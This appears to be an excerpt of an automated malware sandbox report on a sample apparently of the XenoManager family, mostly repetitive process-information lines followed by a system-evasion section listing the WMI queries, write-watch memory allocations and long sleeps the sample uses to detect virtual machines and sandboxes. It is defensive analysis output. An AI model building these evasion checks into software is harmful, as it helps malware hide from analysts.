Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Memory allocated: 19457EB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Memory allocated: 194719C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 21F0F7E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 21F291E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 1E449B50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 1E461D40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 19233150000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 1924CB50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\manager.exe Memory allocated: 2370000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\manager.exe Memory allocated: 2500000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\manager.exe Memory allocated: 4500000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Memory allocated: 30D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Memory allocated: 3240000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Memory allocated: 5240000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Memory allocated: ED0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Memory allocated: 2CA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Memory allocated: 11E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 1B2AFA60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 1B2C9440000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 289898E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 289A3340000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 1ADB34F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Memory allocated: 1ADCD070000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599762 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599649 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599422 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599078 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598969 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598844 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598725 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598625 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598516 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598406 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598297 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598187 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598078 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597969 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597844 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597731 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597625 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597516 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597406 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597296 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597187 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597076 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596969 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596857 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596738 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596624 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596500 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596391 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596281 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596172 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596062 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595953 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595844 Jump to behavior
